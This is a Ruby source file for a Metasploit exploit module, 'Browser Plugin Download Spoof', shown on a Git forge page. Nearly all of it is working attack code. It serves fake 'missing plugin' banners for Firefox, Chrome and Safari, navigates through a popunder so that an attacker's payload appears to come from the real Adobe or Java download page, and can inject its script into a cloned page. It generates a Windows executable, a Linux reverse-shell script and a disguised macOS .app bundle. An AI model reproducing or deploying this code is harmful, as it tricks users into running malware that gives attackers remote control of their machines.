adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
29320f5b7f1433c4bb2d804f4eb83a11bc9a7d97
metasploit-gs/modules/exploits/multi/browser/plugin_spoof_update.rb
T
Joe Vennix 140d8ae42f Need to set timezone first.
2013-08-23 20:09:18 -05:00

598 lines
29 KiB
Ruby
Raw Blame History

##
# This module can be used to "spoof" a download from another site.
##
## Show "broken plugin" image. Clicking the plugin will navigate the user's browser
## to a legitimate URL from the plugin vendor. Simultaneously, a popunder window will
## be opened that waits for the vendor URL to load. Once the vendor page has loaded,
## the popunder navigates the parent frame to your payload.
#
## From the user's point of view, the plugin download looks legitimate.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'open-uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Browser Plugin Download Spoof",
'Description' => %q{
This module serves a page that shows a "broken plugin" image. The user
is coerced into clicking on the image in order to download and update
the plugin. When the image is clicked, a popunder window is opened, and
the original window is navigated to the (legitimate) DOWNLOADURL. Once
the page loads, the popunder navigates the top window to the download served
by this module, and immediately closes itself.
To a user, it will appear that the plugin vendor's (Flash, java) website is
serving them a plugin "update", and they will (hopefully) happily download
and execute our payload.
Note: the page served by this exploit can be embedded into an iframe for a
more realistic-looking attack vector.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>' ],
'References' => [['URL', 'http://lcamtuf.coredump.cx/fldl/']],
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA
}
]
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('PLUGINNAME', [true, 'The name of the plugin.', 'Flash']),
OptString.new('PLUGINURL', [true, 'The URL of the vendor\'s plugin download page.',
'http://www.adobe.com/support/flashplayer/downloads.html']),
OptInt.new('LOADDELAY', [true, 'Seconds to wait before forcing the download.', 3]),
OptString.new('CLONEURL', [ false,
"If specified, displays the contents of the given URL instead of a Loading... message"
])
], self.class)
end
def run
print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
exploit
end
def on_request_uri(cli, request)
if request.uri =~ /(exe|bin|command|sh|zip|autorun|py|pl)$/
print_status("Sending executable payload.")
mime = if request.headers['User-Agent']
'x-content/unix-software'
else
'application/octet-stream'
end
send_response(cli, dropped_file_contents(cli, request.headers['User-Agent']),
'Content-Type' => mime)
elsif request.uri =~ /swf$/
print_status("Sending IE10 a flash .swf to navigate xdomain page.")
send_response(cli, swf_navigate_ie10, 'Content-Type' => 'application/x-shockwave-flash')
else
print_status("Sending HTML of target page.")
send_response_html(cli, generate_html(request.headers['User-Agent']), 'Content-Type' => 'text/html')
end
end
# @return [String] the encoded executable for dropping onto the client's machine
def dropped_file_contents(cli, agent)
return if ((p=regenerate_payload(cli)) == nil)
opts = if target.present? then target.opts else {} end
case agent
when /windows/i
opts.merge!(:code => p.encoded)
generate_payload_exe(opts)
when /linux/i
# Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
@linux_payload ||= linux_payload(p)
when /os x/i
@osx_payload ||= osx_payload(p)
end
end
def linux_payload(p)
# todo: this should kick out a .rpm or .deb file, not a shell script
header = "#!/bin/bash\n\n"
payload = framework.payloads.create('cmd/unix/reverse')
payload.datastore.merge! datastore
header + payload.generate_simple('Format' => 'raw')
end
def osx_payload(p)
exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, target.opts)
exe_name = Rex::Text.rand_text_alpha(8)
app_name = "App.app"
info_plist = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleAllowMixedLocalizations</key>
<true/>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>#{exe_name}</string>
<key>CFBundleIdentifier</key>
<string>com.#{exe_name}.app</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>#{exe_name}</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleSignature</key>
<string>aplt</string>
</dict>
</plist>
EOS
zip = Rex::Zip::Archive.new
zip.add_file("#{app_name}/", '')
zip.add_file("#{app_name}/Contents/", '')
zip.add_file("#{app_name}/Contents/MacOS/", '')
zip.add_file("#{app_name}/Contents/Resources/", '')
zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
zip.pack
end
def popunder_js(agent)
%Q|
document.body.innerHTML="Loading...";
var tt = document.getElementsByTagName("title");
for (var x = 0; x < tt.length; x++) { tt[x].parentNode.removeChild(tt[x]); }
var t = document.createElement("title");
document.head.appendChild(t);
t.innerHTML = "Loading...";
var itval = setInterval(function() {
var done = function() {
clearInterval(itval);
var n = navigator.userAgent;
var chrome = (/chrome/i).test(n);
var safari = (/safari/).test(n) && !(/chrome/).test(n);
var ie10 = /MSIE 1/.test(navigator.userAgent);
var ie9 = /MSIE 9/.test(navigator.userAgent);
var flash = !!navigator.mimeTypes["application/x-shockwave-flash"];
var timeout = #{datastore['LOADDELAY']}*1000;
if(chrome) timeout += 2000;
if(safari) timeout -= 2000;
setTimeout(function(){
if (chrome) {
opener.history.go(-1);
window.setTimeout(function(){
opener.location = "#{plugin_url}";
window.setTimeout(function(){window.close();}, 300);
}, 1000)
} else if ((ie9 \|\| ie10) && flash) {
window.location = "#{swf_url(agent)}";
} else {
opener.location = "#{exe_url(agent)}";
window.setTimeout(function(){window.close();}, 500);
}
}, timeout);
};
try {
if (!opener.checkSOP) {
done();
}
} catch (e) { done(); }
}, 10);
|.gsub(/\s+/, ' ').gsub("'", "\\'") # some chars screw up the injection
end
# provides an HTML interface that "spoofs" the missing plugin image for the user's browser
def generate_html(agent)
if datastore['CLONEURL'].present?
cloned_html(agent)
else
default_html(agent)
end
end
def default_html(agent)
<<-EOS
<!doctype html>
<html><head>
<style>
html, body { margin: 0; padding: 0; }
</style>
</head><body>
<object width="500px" height="500px" src="#"></object>
#{injected_script(agent)}
</body>
</html>
EOS
end
def cloned_html(agent)
fetch_cloned_content
.sub(/(<\/body>|<\/html>|\Z)/imx, injected_script(agent)+'\1')
end
def injected_script(agent)
<<-EOS
<script>
#{js_libs}
window.checkSOP = true;
setTimeout(function(){spoof_plugins({ onclick: function(e) {
if (e && e.preventDefault) e.preventDefault();
var p = popunder('about:blank');
if (browser.chrome) {
window.history.replaceState({}, '', '#{exe_url(agent, nil)}');
}
p.setTimeout('#{popunder_js(agent)}');
window.location = '#{plugin_url}';
}});}, 100);
</script>
EOS
end
def js_libs
<<-EOS
var browser = (function() {
var n = navigator.userAgent.toLowerCase();
var b = {
webkit: /webkit/.test(n),
mozilla: (/mozilla/.test(n)) && (!/(compatible|webkit)/.test(n)),
chrome: /chrome/.test(n),
msie: (/msie/.test(n)) && (!/opera/.test(n)),
firefox: /firefox/.test(n),
safari: (/safari/.test(n) && !(/chrome/.test(n))),
opera: /opera/.test(n)
};
b.version = (b.safari) ? (n.match(/.+(?:ri)[\/: ]([\d.]+)/) || [])[1] :
(n.match(/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/) || [])[1];
return b;
})();
var spoof_plugins = (function(browser) {
browser = browser || {};
var spoof_plugins = function(opts) {
var spoof_els = function(els) {
var spoof_count = 0;
var iterate = function(i) {
spoof_count++;
var el = els[i];
if (el._skip) return;
el._skip = true;
var div = document.createElement('div');
var w = el.offsetWidth || 500, h = el.offsetHeight || 500;
if (h < 150) h = 150;
if (w < 150) w = 150;
var p = el.parentNode;
p.replaceChild(div, el);
div.style.display = 'inline-block';
div.style.width = w+'px';
div.style.height = h+'px';
div.style.textAlign = 'center';
div.style.background = '#f00';
div.style.cursor = 'pointer';
div.onclick = opts.onclick;
// browser-specific stuff
if (browser.safari) {
div.style.background = '#eee';
var style = 'color: #777;font-family:Helvetica;font-size:11px;font-weight:600;text-decoration:none;'+
'line-height:'+div.offsetHeight+'px';
var cstyle = 'color:#eee;background:#777;padding:2px 3px;border-radius:50%;font-size:9px;'+
'font-family:Verdana;text-align:center;font-weight:600;';
div.innerHTML = '<a href="#" style="'+style+'">Missing Plug-in. Click here to install '+
'<span style="'+cstyle+'">&#x2B07</span></a>';
}
else if (browser.firefox) {
var plugin = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAA8CAYAAAA6/NlyAAAAGXRFWHRTb2Z0d2FyZQBBZG'+
'9iZSBJbWFnZVJlYWR5ccllPAAAAyRpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ'+
'2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlI'+
'DUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Ln'+
'czLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8'+
'vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9'+
'Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIE'+
'NTNiAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDowRTI5RjE2Q0Y2MjkxMUUyQUY1RkFCNjExMTIyQTQ4RSIgeG1wTU06'+
'RG9jdW1lbnRJRD0ieG1wLmRpZDowRTI5RjE2REY2MjkxMUUyQUY1RkFCNjExMTIyQTQ4RSI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN'+
'0YW5jZUlEPSJ4bXAuaWlkOjBFMjlGMTZBRjYyOTExRTJBRjVGQUI2MTExMjJBNDhFIiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjBFMjlGMT'+
'ZCRjYyOTExRTJBRjVGQUI2MTExMjJBNDhFIi8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZ'+
'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'+
'K5CYII=';
div.style.borderRadius = div.style.mozBorderRadius = '25px';
div.style.fontFamily = 'arial, sans-serif';
div.style.backgroundImage =
'url(data:image/gif;base64,'+
'R0lGODlhOQA5AJEAAGlpaWhoaGdnZ2pqaiH/C1hNUCBEYXRhWE1QAf/+/fz7+vn49/b19PPy8fDv'+
'7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2'+
'tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359'+
'fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVE'+
'Q0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQwL'+
'CgkIBwYFBAMCAQAAIfkEAAAAAAAsAAAAADkAOQAAApicj6kr7Q+jXLQiifOznOkfdeIBls44miYq'+
'qiXbuSDMyR8F0IOt6RWf8VGAGKGHCDEqTIGX8oJMPknRzdRQtV6zp+uOK/B+uWJw2Gsug9Vk9Nrd'+
'3r7l8WkanhWPq/pmns0HGKU3RxeINyiIRFhn1/hU6PiHuKhIxDhpmEh5aQmEeahZyfnpycORwxIJ'+
'+ai06tpq9CobK2RWAAA7)';
div.style.backgroundRepeat = 'repeat';
div.style.boxShadow = div.style.mozBoxShadow = 'inset 0 0 8px rgba(0,0,0,.5)';
var textShadow = 'text-shadow:1px 1px 2px rgba(0,0,0,.4);';
var style1 = 'height:'+div.style.height+';width:'+div.style.width+';display:table-cell;'+
'vertical-align:middle;color:#fff;font-size:12px;'+textShadow;
var style2 = 'color:#fff;text-decoration:underline;line-height:1.5;'+textShadow;
div.innerHTML = '<div style="'+style1+'"><img src="'+plugin+'" style="display:inline;" /><br />'+
'A plugin is needed to display this content.'+
'<br /><a href="#" style="'+style2+'">Install plugin...</a></div>';
}
else if (browser.ie) {
}
else if (browser.chrome) {
var puzzlep = 'data:image/gif;base64,R0lGODlhRABDAMQAAMvLy9LS0piYmNXV1eHh4aqqqrKystzc3N7e3pCQkH19f'+
'YiIiJaWlpycnIWFhZOTk9fX19TU1J+fn9jY2IqKisPDw56enpSUlNra2o2NjaKioouLi6GhoZubm46Ojru7'+
'uyH/C1hNUCBEYXRhWE1QAf/+/fz7+vn49/b19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0'+
'M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZC'+
'Pjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT0'+
'5NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQ'+
'wLCgkIBwYFBAMCAQAAIfkEAAAAAAAsAAAAAEQAQwAABf/gJ45kaZ5oqq6n0XleIs90LcN4rmd8329AIGVI3DAKKcY'+
'mdrkwntCodNqsWpuPrDZrm+Eyl9Mlk2AIBJ20es1ur8/wuFwgvWpljJJhU043LIASgoOEhICHgA2Ki4pub2cdZ1IPC'+
'UgjLwwdfxIcnZ6foKGFg4iJFowNbXMMD3kjMQINgqGdGhwatrSdo4aIqKmPcU8XGxWvD5qzoLi2zLqfvBKljG5yUMUj'+
'CRcdFpzLzOC4tbvAyYWlp9RswlAUxiJ9Ft/h9LkSGgb5BhoC3aTTqNbBieIuWyZ5nuop5CChAIADBAggAFAgFilpvha'+
'pYsegILyDnxTW41AgQMSTBA7/FLjgD+OhPxo30hnm8UMfbwlFguNQASXKCtv+vYwpcCCDCwve2cyEUyc9CxN8ngQq4Fwi'+
'osFmHk36imlOp8waQJRKoMKDqoK6DW1UVNIwriI8eK0FNiwAsgQMLOjQ60+6ahyRKpXL92vde1F96k0gy+VVtjKHNYH7gT'+
'BOumA5VPX5QYEHbgADZo0yeTBIzLY4ieRgocPYlAUUoE3ry5E1yYK7cgupQYKBAhxYORG2radEBHkVnJV0gYuHqhoiZWWO'+
'hTJhhAkbGJeIAUOEAOAnYECAnLz5CBUqAFgPIEIE8d0xCECW5vbR6qaTgeqwnSzy4+aRd8CABBZIIAYKJKCG/333PWDdNo'+
'19wh9eJwVooYEGxgeBZ27dh8UWDg4G4WWa9eeTheZhqGJ8ASiQAWkfUkKDAyKa4400d+GFooAqDhhffAAkCGNzMnpB4ysX'+
'WDQIaxrkeCKKPRb4IwYTTNCiXB5uQQMMR8aVZGOkcOBkRDsegECUB0xJZZVBlmHFHV5wqRQYsbQkQQNNorTjmWiqueYEQX'+
'rwJpw3yDkCnaBJI0EHJQEIJZppTlnlpIEOWmShHnT5QQZngRaILHeVCamfk056ZROF1vCFAnN2ClCo/5HZp5qlljqAiw9cc'+
'AsHDSRARqE8sHqoq4h0wEBPyAWQ3l2z/lhrlRBAMEBsGZQ0AP8EFGVAQQJfZCCsCJyioc4DxlUgwAIbdGBAShnSWmu00Q4wQ'+
'AD4ADCBvNIWsEAGMPTw7aYJiFuOsQXkQ4EDHjzgwQIfSOnuu/BKe+2ZA7jnHrYMIOyBv0rxkYkbYziwQZJpMJDABAdKCjG88'+
'rZs8cvvdeCiD/96DIdAZqChRgINk1pqxBK3LC/M7gVwgMwb/FCzNjlHorPO9alxgQaRxvdsxEK7HEHFL4N3gAAKJM3DBv9SkH'+
'DOkNSXdhwXFFD1n5MCnTXXBxhdMXjgRQB20kH8u8DZc6DBT5JxJBCA1SsHnbXFDCRYAQR4Y/DBAiJn0LdSf7cyB3/RalCGJBak'+
'+ez/BFjPvbV7FSiggAMPAEAlBhV4oMC+lm9Agd9koH3GAwUMcOYEDSzArQARwA1t6Yu/3JnZQCgo++p8C4H753HwjvKAAw'+
'CgXvFXIy800UHy4cEGDjiwOrpj23475rnLUQkEb1dpPLziKT400cqGDazY6RPxrwNkcAIU5tOkt80vWhNAzwcAcK37wSwARVPA'+
'tjDlAyFQYAH/44MAnzAfMVWte5DjgOpGaIAEcs1ieQtAkP7GrX79QH0XzCDTSCOACkQqcRGQwOpikADyGQACD8QbeMqXgwrCcA'+
'EYVIrIZhgFnh0AhNJKnfA+tAEJMLBoQsRbAgDYrf5dEIkybMVRoOCB/4atrIEGwBWRKMGfeUEwi+BpgItc+MIvglGJfMhVE8j4ASp'+
'B4HhBi0BstLEFD1jxO3DEWxr5tbE62jGJI3CA2fRoBQ+UkHTeQ49nuHADAyQyi6lbwguPiERIikCSCbvCBSwJyLnN61w1MAAWP5k/'+
'CoySCKW8YyRZqEpLvidei5NXABwkg2q9kZbgWeEtH6nLU7IQRBdIgBUR0B1oZS2BGkiQrwxQNyG6p2UqBEBnaFe7IeSylP/bVwJARA'+
'nefWBZ60Gh9vSFsB42CZHhNMZveiOABMyunOY8ZzM/4AB1rnOdWsjUPzMhgAI4lB8YBGAxM2ABhzrUAgIg2whHuAAKWOxQoEgsaDp'+
'/VQMZaSuk5hth+WzJw42ldKPlK19HhxAEXIK0fCPlYRe6oIOeNjIIQA1C7Uh5U5wqEV063SlPe+qDpg61pgEFKUqNusslKHVLLSxiI5'+
'savaASgZkCjSlVnclSGLQwVT7tIldrasGvSrWUYh1rZSTJyLRqlV9OfWpbcQnWc8ZVrNgQQQEKWlef4jWvlnvqV9361lz+VawFUMoHN'+
'tBRxFrWiHu1aWP9+tiCSlYElLPlZdMX1Mxu9q2dLd87T1CAB2z0tbCNrWxnS9vXVis9KkiPbnfL29769rfADS5uWUDc4hr3uCIIAQA7';
div.style.background = '#bbb';
div.style.fontFamily = 'arial, sans-serif';
div.style.border = '1px solid #000';
div.style.boxSizing = 'border-box';
var imgs = 'margin-bottom:5px;display:inline;text-align:center;'
var stylec1 = 'height:'+div.style.height+';width:'+div.style.width+';display:table-cell;'+
'vertical-align:middle;color:#000;font-size:12px;';
var stylec2 = 'color:#000;text-decoration:underline;line-height:1.5;';
if (parseInt(browser.version) < 6) {
stylec1 += 'background:#fbee97;';
puzzlep = 'data:image/gif;base64,R0lGODlhIAAgAMQAAK6riufr8UNdlkpknC5DeZynwCc+djJMiNbc5+Lm7k5adNzh6/r7/CtGhHuIpSQ3aFN'+
'somx3kfP1+D1Thj5Xkb/G1PDy9iVAgCExWRonR+zu9Gt+p/f4+vzslzJBYzdSjSH/C1hNUCBEYXRhWE1QAf/+/fz7+vn49/b19PPy'+
'8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqW'+
'ko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWF'+
'dWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQwLCg'+
'kIBwYFBAMCAQAAIfkEAAAAAAAsAAAAACAAIAAABf9gBxgGYZ5oepIsSQBiOVF0bdvT9O38d/wvmWBALBqPA4FSefMZPgKIdErdODZD5HJ'+
'JORAoA6q4wGBwKmDtlvL5hsXTcpnjNm4FtDYYLh3IORweE1lEa3lufBADZIARgoSGh3tSDoqFDoAJHoIUQxsDnXg1em9kcmaAHBIJFRau'+
'GhoRH01ek6ZzqRISrq8aARAHM3k+iIu4gLq7vbABm7NsO7Vhxrm6vBawvgEBGATPPF4TRQXVysvb2woeBz0HDQaDROTJ5tnoAQkJ6gUVE'+
'A0/76AQwVQAQ4Rl2vDlY4VggcMJBBoEzEJhwiYPBbAx27Ywn8OPDh5EfJIFT44JEQLsJOyY4ONHBCENXDBwYIiADQUg5CiQUKHHBfoiOKz'+
'g4YFMmqFaJcCJjmXLjxkyKHDgAcODCzMPJN3YtKNLBAqsPhhroEHWThR4dkUQIYOHCi4XgMVQAusFs0jxFOiawEEGqx4cIhgM1qjEw'+
'1mfOeC4MGwJAYIJR6B72OyFBw2eRXCKwMMXwqAnl5VoF/MsKF4dKiAAAfTgCg7o3rV7OXM0Agpy6zZKwEGE3B6iWpVJuzY4L2OTl3g3'+
'FoNYo8VnimQXzR2KygRaRLdr4Cr1H+DdAaxseTtWAyP+hQdPvrL58zAAELjbvvz7mS1ghAAAOw==';
}
div.innerHTML = '<div style="'+stylec1+'"><img src="'+puzzlep+'" style="'+imgs+'" /><br />'+
'No plug-in available to display this content.'+
'<br /><a href="#" style="'+stylec2+'">Install plugin...</a></div>';
}
};
for (var i = 0; i < els.length; i++) { iterate(i); }
return spoof_count;
};
var tryspoof=function() {
var objects = top.document.getElementsByTagName('object');
var embeds = top.document.getElementsByTagName('embed');
var spoof_count = spoof_els(objects) + spoof_els(embeds);
if (spoof_count > 0) {
if (browser.firefox) {
// on firefox, let's spoof the "Install Plugin" slide-down dialog
var pp = 'data:image/gif;base64,R0lGODlhEAAPAMQfAFFEAExCAG1hFkk+AHNmElVHAEc8AEQ7AWBQAFxNAGNWAExDAU1EAGdZAI96AE'+
'E3AF5QAD41AEc9AGdWAGZWAC8oAv/98WFRAF1OAFZIAGlYAFlLAEs/AExAAP///////yH/C1hNUCBEYXRhWE1QAf/+/fz7+vn49/b'+
'19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuq'+
'qainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1'+
'cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA'+
'8ODQwLCgkIBwYFBAMCAQAAIfkEAQAAHwAsAAAAABAADwAABYGgpVRkpVhiaVrfESzMcnwtzASzJRA8IaC73q8RMUiMD9LDaDA8iJIBZ'+
'zAwHA4SzpQjiTw4nQ4YHC6LH9/yWBseo9tjNbnz6GTumUIef9dzABuBgoODAAUJCRiKi4mMgBeQCJCTlBcbEBQTmhSZnBOcmRAOGqSlp'+
'qYOHx6rrK2tHyEAOw==';
var dialog = document.createElement('div');
var leftstyle = 'position:absolute;left:10px;top:0;font-size:11px;color:#000;font-weight:600;'+
'font-family: arial, sans-serif;line-height:27px;';
var btnstyle = 'position:absolute;right:10px;top:5px;font-size:11px;color:#000;border-radius:10px;'+
'background:#ccc;padding:2px 12px;background:#f6f6f6;background-image:'+
'linear-gradient(0deg, #e9e9e9, #f6f6f6);border:1px solid #a0a0a0;'+
'font-family: arial, san-serif;box-shadow:inset 0 1px 1px rgba(255,255,255,.3),'+
'0 1px 1px rgba(255,255,255,.3);cursor:pointer;';
if (!navigator.userAgent.match(/macintosh/i)) {
btnstyle += 'top: 4px;border:1px solid #043779;padding-top:3px; padding-bottom:3px;border-radius:4px;';
}
dialog.innerHTML = '<div style="'+leftstyle+'"><img src="'+pp+'" style="vertical-align:middle;margin-right:10px" />'+
'Additional plugins are required to display all the '+
'media on this page.</div>'+
'<div style="'+btnstyle+'">Install Missing Plugins...</div>';
dialog.style.position = 'absolute'; // necessary?
dialog.style.position = 'fixed';
dialog.style.left = dialog.style.right = '0';
dialog.style.height = '27px';
if (navigator.userAgent.match(/macintosh/i)) {
dialog.style.background = '#ffe600';
dialog.style.backgroundImage = 'linear-gradient(0deg, #fdcb00, #ffe600)';
dialog.style.borderBottom = '1px solid #bd8d00';
} else {
dialog.style.background = '#ffffde';
dialog.style.borderBottom = '1px solid #aca997';
}
dialog.style.boxShadow = '0 -1px 1px rgba(255,255,255,.3)';
dialog.style.top = '-27px';
document.body.style.position = 'relative';
document.body.style.top = '0';
document.body.appendChild(dialog);
dialog.onclick = opts.onclick;
// animate it in
var y = -27;
var clearme = window.setInterval(function(){
dialog.style.top = (++y)+'px';
if (y >= 0) {
window.clearInterval(clearme);
document.body.style.top = '27px';
}
}, 10);
}
}
};
var to = 300;
setTimeout(function(){tryspoof();}, to);
};
return spoof_plugins;
})(browser);
